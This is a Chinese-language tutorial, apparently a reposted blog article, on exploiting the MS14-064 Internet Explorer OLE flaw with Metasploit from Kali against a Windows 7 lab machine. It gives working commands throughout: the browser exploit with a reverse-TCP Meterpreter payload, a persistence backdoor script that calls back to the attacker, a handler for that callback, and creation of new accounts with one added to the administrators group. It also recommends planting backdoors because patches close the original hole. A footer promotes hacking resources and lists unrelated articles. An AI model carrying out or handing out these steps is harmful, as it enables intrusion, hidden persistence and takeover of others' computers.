网络安全实战之植入后门程序

在 VMware 上建立两个虚拟机:win7 和 kali。

Kali:它是 Linux 发行版的操作系统,它拥有超过 300 个渗透测试工具,就不用自己再去找安装包,去安装到我们自己的电脑上了,毕竟自己从网上找到,也不安全。它甚至还集成了 600 多种黑客工具,很强大。

可以永久免费使用,基本上学黑客攻击必会用到这个系统。

靶机:Win7 64位 (IP: 192.168.10.45)--用 ipconfig 进行查询。

攻击机:Kali (IP:192.168.10.21)--用 ifconfig 进行查询。

【一一帮助安全学习,所有资源获取处一一】

①网络安全学习路线

②20 份渗透测试电子书

③安全攻防 357 页笔记

④50 份安全攻防面试指南

⑤安全红队渗透工具包

⑥网络安全必备书籍

⑦100 个漏洞实战案例

⑧安全大厂内部视频资源

⑨历年 CTF 夺旗赛题解析

1、实验环境前提条件

win7 中,关闭防火墙(“打开网络和共享中心”-“Windows 防火墙”-“打开或关闭 Windows 防火墙”-均选择关闭选项)。

保证两个虚拟机是可以 ping 通的(尤其是在 kali 中去 ping win7,看能否连通)。$ping 192.168.10.45

2、打开 Metasploit 渗透工具

Metasploit 是一款开源的安全漏洞检测工具,msfconsole 用于启动 msf 终端:

>msfconsole

复制代码

**结果:**成功进入,进入到"msf6>“的模式下

3、查看需要利用的漏洞

搜索漏洞,编号为 MS14-064。

MS14-064 为 Windows OLE 自动化阵列远程代码执行漏洞。当 IE 不作访问内存中的对象时,存在远程代码执行漏洞。OLE(对象链接与嵌入)是一种允许应用程序共享数据和功能的技术,远程攻击者利用此漏洞通过构造的网站执行任意代码,用户使用 IE 浏览器查看该网站时允许远程执行代码。

补充:Windows 系统漏洞微软的漏洞编号命名格式为:MS14-064;

MS Micosoft 的缩写,固定格式;14 表示年份,即 2014 年发布的漏洞;064 表示顺序,即当年度发布的第 64 个漏洞。

>search ms14-064

复制代码

**结果:**可以看到返回了多条可利用的漏洞模块信息

4、尝试利用其中一个漏洞模块进行攻击

利用其中一个漏洞攻击模块-0 模块,进行攻击,进入模块中(注意:必须是“_”,不是“-”,否则会报错)。

>use exploit/windows/browser/ms14_064_ole_code_execution

复制代码

**结果:**成功切换到这个模块之下--”msf6 exploit(windows/browser/ms14_064_ole_code_execution)>“

并提示“no payload configured,defaulting to windows/meterpreter/reverse_tcp”--没有配置 payload,默认为 windows/meterpreter/reverse_tcp

5、查看该漏洞模块所需的参数情况

进到这个漏洞模块之后,先查看该测试模块的参数情况。类似于你使用一软件,进行攻击,是不是需要先进行一些简单的参数配置啊,需要告诉软件,要向谁发起攻击吧,这是最最基本的,所以,要配置,就要先查看都可以配置哪些参数。

>show options

复制代码

**结果:**其中 required 显示的值为 yes 的,代表是必须要设置的项;显示的值为 no 的,代表是不必须要设置的项;

重点关注 6 个参数配置,需要设置哪个就设置哪个:

Payload (攻击载体-使用默认的 windows/meterpreter/reverse_tcp 即可) ;

SRVHOST (文件共享服务器-kali 地址);

SRVPORT (文件共享服务器的端口-使用默认获取的端口即可);

LHOST (发起攻击的地址-kali 地址);

LPORT (发起攻击的端口-使用默认获取的端口即可);

AllowPowershellPrompt (开启浏览器插件,默认为 false)

补充说明:

1)Payload 中包含有需要在远程系统中运行的恶意代码,Payload 是一种特殊模块,它们能够以漏洞利用模块运行,并能够利用目标系统中的安全漏洞实施攻击。也就是说,漏洞利用模块可以访问目标系统,而其中的代码定义了 Payload 在目标系统中的行为。

2)Payload 模块主要有以下三种类型:-Single -Stager -Stage

Single 是一种完全独立的 Payload,实现的目的也简单,但容易被捕捉到。

Stager 这种 Payload 负责建立目标用户与攻击者之间的网络连接,并下载额外的组件或应用程序。 一种常见的 Stagers Payload 就是 reverse_tcp,它可以让目标系统与攻击者建立一条 tcp 连接(3 次握手-4 次挥手)(是一个基于 TCP 的反向链接反弹 shell, 使用起来很稳定)。

Stage 是 Stager Payload 下载的一种 Payload 组件,这种 Payload 可以提供更加高级的功能,而且没有大小限制。

3)windows/x64/meterpreter/reverse_tcp 则由一个 Stager Payload(reverse_tcp)和一个 Stage Payload(meterpreter)组成。

注意:Payload 为 windows/meterpreter/reverse_tcp 默认获取到的控制通道 meterpreter 为 32 位,

如果想将之后获取到的控制通道 meterpreter 改为 64 位,则设置。payload:windows/x64/meterpreter/reverse_tcp

6、设置文件共享服务器

发现 SRVHOST 为空,待设置,其它(payload/SRVPORT/LHOST/LPORT)均已获取,且正确,设置 SRVHOST 的对应的参数地址,它指的是文件共享服务器的地址,想一想,要设成谁?为什么?

分析一下:是在哪里用到这个文件共享服务器?是不是会在生成一个网址,诱导用户点击了,就会直接连接到发起攻击的主机上。那你们觉得应该是谁生成这个连接呢?是用户那边么?还是攻击者这边?肯定是攻击者这边吧,我们是不知道会有谁点了这个网站链接吧。

所以,我们才会对这个文件共享服务器的地址设置为 kali 的地址

>set SRVHOST 192.168.10.21

复制代码

7、开启浏览器插件

要把 AllowPowershellPrompt 的默认参数 false 改为 true,因为 msf 中自带的漏洞是利用 exp 调用的是 powershell(powershell 是一种命令外壳程序和脚本环境),所以 msf 的 exp 代码只对安装了 powershell 的系统生效。

>set AllowPowershellPrompt true

复制代码

8、再次进行检查

查看对 SRVHOST 和 AllowPowershellPrompt 进行的修改,是否修改成功

>show options

复制代码

9、检查无误后,发起攻击

>run

复制代码

**结果:**生成一个网站的链接“Using URL : http://192.168.10.21:8080/xE6RxjSy,开启服务,光标停留在这,等待有人点击该网站链接。

10、打开网站链接

到 win7 中,在 IE 浏览器中打开网站链接: http://192.168.10.21:8080/xE6RxjSy,会提示是否允许打开一个文件,选择“允许”之后,即可触发会话连接。

**结果 1:**在 win7 中打开链接后,不会有任何的反馈结果。

**结果 2:**由于在 win7 中触发打开了网址链接,那么,在 kali 中,则会触发会话连接,结果显示了是 192.168.10.45(目标主机 win7)尝试点击了该网站链接,于是,kali 利用 MS14-064 漏洞模块对目标主机发起了攻击,最终,“meterpreter session 1 opened”--表明已经开通 192.168.10.21:4444 和 192.168.10.45:49191 会话连接 1。

一般会自动进入控制通道 meterpreter,交互模式,表明攻击成功。

注意:

一旦开通一个会话连接后,若系统没有自动进入控制通道,则可以尝试回车,进行手动连接。

1)手动查看当前存在的会话

注意在目录 msf>下,手动查看当前存在的会话。

**结果:**当前只有会话连接 1,meterpreter 建立的连接类型 type 是 x86--32 位的(由模块中的 payload 设定),以及展示目标主机 192.168.10.45 的基本信息和连接信息。

>sessions

复制代码

2)选择连接当前已经开通的会话 1

>sessions -i 1

复制代码

**结果:**成功进入控制通道 meterpreter,交互模式,表明攻击成功。

11、植入后门程序

在 kali 控制 win7 后,通过 persistence,在目标主机上生成一个后门程序,以便后续不再通过 MS14-064 漏洞进行二次入侵,而是通过这个后门文件来入侵该主机【注意在控制通道 meterpreter>下】。

注意:因为这个 MS14-064 漏洞很容易被修复,一旦目标主机进行定期修补漏洞,那么通过 MS14-064 漏洞进行入侵的路径,就会失效,但植入的后门程序是不容易被发现和修复的,所以一旦入侵成功后,建议尝试植入后门程序。

通过 persistence(支持多种方式启动)植入固定的后门程序,设置相关参数,设置回连地址和端口号。

>run persistence -S -U -X -i 5 -p 40000 -r 192.168.10.21

复制代码

重点关注 6 个参数配置:

-S:系统启动时自动加载本程序(因为该后门程序是不能被目标用户发现,更不需要让目标主机进行点

击启动的,所以需要该程序有自动加载的功能);

-U:用户登陆时自动加载本程序;

-X:开机时自动加载本程序;

-i: 自动加载后,回连的时间间隔,即后门每隔多少秒尝试连接回连地址;

-r: 自动加载后,回连的主机地址,回连到谁啊,自然是入侵的 kali 的地址;

-p:自动加载后,回连的端口号,即 kali 地址的端口号,理论上可随意设置,但范围不要超过 65535,且

不可设置为常见的特殊的端口号;

**结果 1:**在 kali 中提示,成功生成一个后门程序 yqLAOjt.vbs,自动加载后会回连到192.168.10.21:40000,并保存于目标主机 win7 中的C:\Users\18044\AppData\Local\Temp\目录下。

【**注意:**payload 自动设置为“windows/meterpreter/reverse_tcp”,LHOST 设置为192.168.10.21,LPORT设置为40000

**结果 2:**在 win7 中的 C:\Users\18044\AppData\Local\Temp\目录下,成功找到从攻击主机 kali 植入的后门程序 yqLAOjt.vbs

【补充知识点:

1)端口号范围:0~65535

2)常见端口号列举

12、挂起当前会话

在成功植入后门程序后,我们还需要对该后门程序进行验证,验证是否可以通过该后门程序成功入侵目标主机 win7,所以可先将当前通过 MS14-064 漏洞开启的会话连接挂起(background)或断开(exit),均可

meterpreter>background

复制代码

**结果:**成功将 session 会话 1 挂起到后台,并没有断开连接,且成功切换到 msf >目录下

13、开启监听模块

利用后门程序进行攻击,需要打开一个监听模块,能够反弹 shell 监听模块,进行攻击,进入模块中

>use exploit/multi/handler

复制代码

**结果:**成功切换到这个模块之下--”msf6 exploit(multi/handler)>“

并提示“Using configured payload generic/shell_reverse_tcp”--使用的payload为generic/shell_reverse_tcp

14、查看该监听模块所需的参数情况

进到这个监听模块之后,先查看该模块的参数情况。类似于你使用一软件,进行攻击,是不是需要先进行一些简单的参数配置啊,需要告诉软件,要向谁发起攻击吧,这是最最基本的,所以,要配置,就要先查看都可以配置哪些参数?

>show options

复制代码

**结果:**其中 required 显示的值为 yes 的,代表是必须要设置的项;显示的值为 no 的,代表是不必须要设置的项;

重点关注 3 个参数配置,需要设置哪个就设置哪个:

Payload:攻击载体;

LHOST:回连地址;

LPORT:回连端口号;

15、设置攻击载体、回连地址以及端口号

因为我们要开启的这个监听模块,是专门针对于 yqLAOjt.vbs 后门程序,进行实时监听,那么,必然需要将监听模块的参数配置,与 yqLAOjt.vbs 后门程序的参数配置保持一致,只有这样,才能达到准确的监听

之前制作 yqLAOjt.vbs 的参数为:

"run persistence -S -U -X -i 5 -p 40000 -r 192.168.10.21"

复制代码

因此,我们也就需要将监听模块的攻击载体 Payload,与后门程序的 payload 保持一致:

>set payload windows/meterpreter/reverse_tcp

复制代码

需要将监听模块的回连地址 LHOST,与后门程序的 LHOST 保持一致:

>set LHOST 192.168.10.21

复制代码

需要将监听模块的回连地址的端口号 LPORT,与后门程序的 LPORT 保持一致:

>set LPORT 40000

复制代码

16、再次进行检查

>show options

复制代码

17、检查无误后,发起攻击

>run

复制代码

**结果:**开启针对192.168.10.21:40000的监听模式,因为 yqLAOjt.vbs 后门程序已经设置了自动加载,所以一旦开启监听模块,立即会有反馈信息回连到192.168.10.21:40000上来。

最终,“meterpreter session 2 opened”--表明已经开通192.168.10.21:40000和192.168.10.45:49227的会话连接 2。

一般会自动进入控制通道 meterpreter,交互模式,表明攻击成功。

注意:

此时,将当前开启的会话进行挂起操作--background,再查看当前已存在的会话--sessions,结果会得到已开启两个会话连接信息,要对这两个会话连接进行区分,分清楚,第一个会话连接是通过 MS14-064 漏洞开启的,第二个会话连接是通过后门程序开启的

18、创建用户、设置密码

1)拿到 shell 权限,获得控制台权限,可以获取系统的控制台C:\Windows\system32

meterpreter>shell

复制代码

2)进入后,可能会有乱码的情况,解决乱码问题

C:\Windows\system32>chcp 65001

复制代码

3)显示 win7 系统中所有的用户

C:\Windows\system32>net user

复制代码

4)创建用户

创建用户,用户名为 test,密码为 test【net user 用户名 密码 /add】

C:\Windows\system32>net user test test /add

复制代码

也可以不设置密码,只创建用户名为 test1 的无密码用户【net user 用户名 /add】

C:\Windows\system32>net user test1 /add

复制代码

**结果 1:**在 kali 中,若结果显示“the commad completed successfully”—代表“命令执行成功” ,用户创建成功 ;

若结果显示“system error 5 has occurred;access is denied”—“发生系统错误 5; 拒绝访问”-----代表权限不够的问题,需要**进行提权,可以利用 bypassuac 或者 Windows 内核漏洞进行提权

**结果 2:**在 win7 中,”控制面板“---”添加或删除用户账户“,查看成功新建的用户 test(标准用户--密码保护)、test1(标准用户--无密码)

5)将新用户添加到 administrator 分组--提升到管理员权限【net localgroup administrators 用户名 /add】

C:\Windows\system32>net localgroup adminis trators test1 /add

复制代码

**结果 1:**在 kali 中,显示“the commad completed successfully”—代表“命令执行成功” ,成功添加到 administrator 分组,提升管理员权限成功 ;

**结果 2:**在 win7 中,”控制面板“---”添加或删除用户账户“,查看新建的用户 test1 用户由之前的”标准用户“提升至”管理员“,提升权限成功。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/10696.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

如何把数据库中的数据显示到页面

主要内容:使用JDBC访问数据库中数据(Java Web数据可视化案例) 文章目录前期准备:案例:第一步:创建数据库及数据第二步:编写实体类第三步:编写Dao类第四步:编写Servlet代码…

springboot集成hadoop3.2.4HDFS

前言 记录springboot集成hadoop3.2.4版本&#xff0c;并且调用HDFS的相关接口&#xff0c;这里就不展示springboot工程的建立了&#xff0c;这个你们自己去建工程很多教程。 一、springboot配置文件修改 1.1 pom文件修改 <!-- hadoop依赖 --><dependency><gro…

Stable Diffusion - API和微服务开发

Stable Diffusion 是一种尖端的开源工具&#xff0c;用于从文本生成图像。 Stable Diffusion Web UI 通过 API 和交互式 UI 打开了许多这些功能。 我们将首先介绍如何使用此 API&#xff0c;然后设置一个示例&#xff0c;将其用作隐私保护微服务以从图像中删除人物。 推荐&…

一种轻量的“虚拟机”——Windows 沙盒模式

Windows 沙盒模式Windows沙盒的好处操作步骤Windows沙盒的好处 相比虚拟机和第三方的沙盒软件&#xff0c;Windows Sandbox启用后仅占用100MB硬盘空间&#xff0c;还能与物理机安全地共享部分内存空间。简单来说就是易用、免费、不卡机&#xff01; 由于要保证沙盒内的数据不…

(九)【软件设计师】计算机系统-浮点数习题

文章目录一、2009年下半年第3、4题二、2011年上半年第5题三、2012年下半年第3题四、2015年上半年第1题五、2015年下半年第3题六、2016年下半年第3题七、2018年上半年第1题八、2020年下半年第3题知识点回顾 &#xff08;八&#xff09;【软件设计师】计算机系统—浮点数一、2009…

Android13 PMS是如何启动的?

作者&#xff1a;Arthas0v0 平常使用安卓实际就是在使用各种app&#xff0c;而下载的app实际是一个apk文件。这个apk文件的安装就交给了PackageManagerService来实现。PackageManagerService的启动也是在SystemServer中。这个过程比较长需要长一点的时间来理。 SystemServer.s…

ORACLE EBS 系统架构与应用实践(一)

一、从ERP到EBS 从上世纪70年代晚期的物料需求计划MRP&#xff08;Material Requirements Planning&#xff09;到80年代的MRP II&#xff0c;再到90年代的企业资源计划ERP&#xff08;Enterprise Resource Planning&#xff09;&#xff0c;企业管理软件&#xff08;或曰应用…

u盘里的文件被自动删除了怎么办?五种数据恢复方案

u盘是我们日常生活中常常用到的一种便携式存储设备&#xff0c;可以帮助我们存储和携带大量的文件信息。但是&#xff0c;使用过程中难免会遇到一些问题&#xff0c;例如u盘会自己删除文件的情况&#xff0c;如果你遇到了这种情况&#xff0c;该怎样找回u盘自己删除的文件呢&am…

AI 芯片的简要发展历史

随着人工智能领域不断取得突破性进展。作为实现人工智能技术的重要基石&#xff0c;AI芯片拥有巨大的产业价值和战略地位。作为人工智能产业链的关键环节和硬件基础&#xff0c;AI芯片有着极高的技术研发和创新的壁垒。从芯片发展的趋势来看&#xff0c;现在仍处于AI芯片发展的…

FFMPEG: [ API ] >打开/关闭一个输入文件

它们是成对出现的. ffmpeg 把输入文件--转换成--->AVFormatContext实例 ◆ avformat_open_input() int avformat_open_input(AVFormatContext ** ps,const char * url,ff_const59 AVInputFormat * fmt,AVDictionary ** options )Open an input stream and read the header.…

分子生物学 第二章 遗传物质

文章目录第二章 遗传物质第一节 遗传物质的分子本质大多数生物体的遗传物质是DNA有些生物体的遗传物质是RNA蛋白质能否充当遗传物质第二节 核酸的结构1 DNA双螺旋结构的特征2 影响DNA双螺旋结构稳定性的因素3 DNA结构的多态性4 DNA多链结构5 DNA的超螺旋结构6 RNA的二级结构第三…

归并排序(非递归实现) 计数排序

上一期我们说了归并排序的递归是如何实现的&#xff0c;但是递归如果层次太多的话容易栈溢出&#xff0c;所以我们还需要掌握非递归的实现&#xff0c;但是我们非递归需要如何实现&#xff1f; 下面我们就来看一下非递归的实现 归并排序的非递归实现他并不需要栈队列这些东西…

day10_oop

今日内容 零、 复习昨日 一、面向对象的概念 二、面向对象编程 三、内存图 零、 复习昨日 晨考复习… 一、作业 package com.qf.homework;import java.util.Arrays;/*** --- 天道酬勤 ---** author QiuShiju* desc* ----------------* 引用数据类型的默认初始值null*/ public …

Redis数据备份与恢复

Redis数据备份与恢复 文章目录Redis数据备份与恢复1. Redis备份的方式2. RDB持久化2.1 什么是RDB&#xff1f;2.2 Fork操作2.3 save VS bgsave2.4 关于RDB备份的一些配置项2.5 RDB的备份与恢复2.6 RDB的自动触发2.7 RDB的优势与劣势3. AOF持久化3.1 什么是AOF&#xff1f;3.2 A…

ASP一个简单的网上教务系统模型的设计与实现

对于一个学校来说&#xff0c;大量教师信息&#xff0c;学生信息管理&#xff0c;学生成绩管理&#xff0c;基本数据的维护都难于通过传统的方法进行管理&#xff1a;这就迫切需要利用计算机技术来帮助学校管理者处理这些日常管理。本系统正是为了简化教学任务的管理&#xff0…

Python爬虫之多线程加快爬取速度

之前我们学习了动态翻页我们实现了网页的动态的分页&#xff0c;此时我们可以爬取所有的公开信息了&#xff0c;经过几十个小时的不懈努力&#xff0c;一共获取了 16万 条数据&#xff0c;但是软件的效率实在是有点低了&#xff0c;看了下获取 10 万条数据的时间超过了 56 个小…

Vue——组件基础

目录 定义一个组件​ 使用组件​ 传递 props​ 监听事件​ 通过插槽来分配内容​ 动态组件​ DOM 模板解析注意事项​ 大小写区分​ 闭合标签​ 元素位置限制​ 组件允许我们将 UI 划分为独立的、可重用的部分&#xff0c;并且可以对每个部分进行单独的思考。在实际应…

如何用 YonBuilder 构建线索管理应用

加速企业数智营销&#xff1a;如何用 YonBuilder 构建线索管理应用 如何用 YonBuilder 低代码开发线索管理应用&#xff1f; 线索管理是指通过各种渠道收集、筛选、打分、分配、跟进和培育潜在客户的信息&#xff0c;以便将其转化为成交客户的过程。 通过数智化手段实现良好…

00后整顿职场,我直呼太卷了....

内卷的来源 内卷最早的“出处”是几张名校学霸的图片。 大学生们刷爆朋友圈的几张“内卷”图片是这样的&#xff1a;有的人骑在自行车上看书&#xff0c;有的人宿舍床上铺满了一摞摞的书&#xff0c;有的人甚至边骑车边端着电脑写论文。这些图片最早在清华北大的学霸之间流传。…

C++学习从基础到高阶(基于黑马程序员教程)

视频链接&#xff1a;黑马程序员匠心之作|C教程从0到1入门编程,学习编程不再难&#xff08;52个小时&#xff09; C语言中文网&#xff1a;http://c.biancheng.net/cplus/ Visual Studio 2022 下载地址&#xff1a;https://visualstudio.microsoft.com/zh-hans/downloads/ Visu…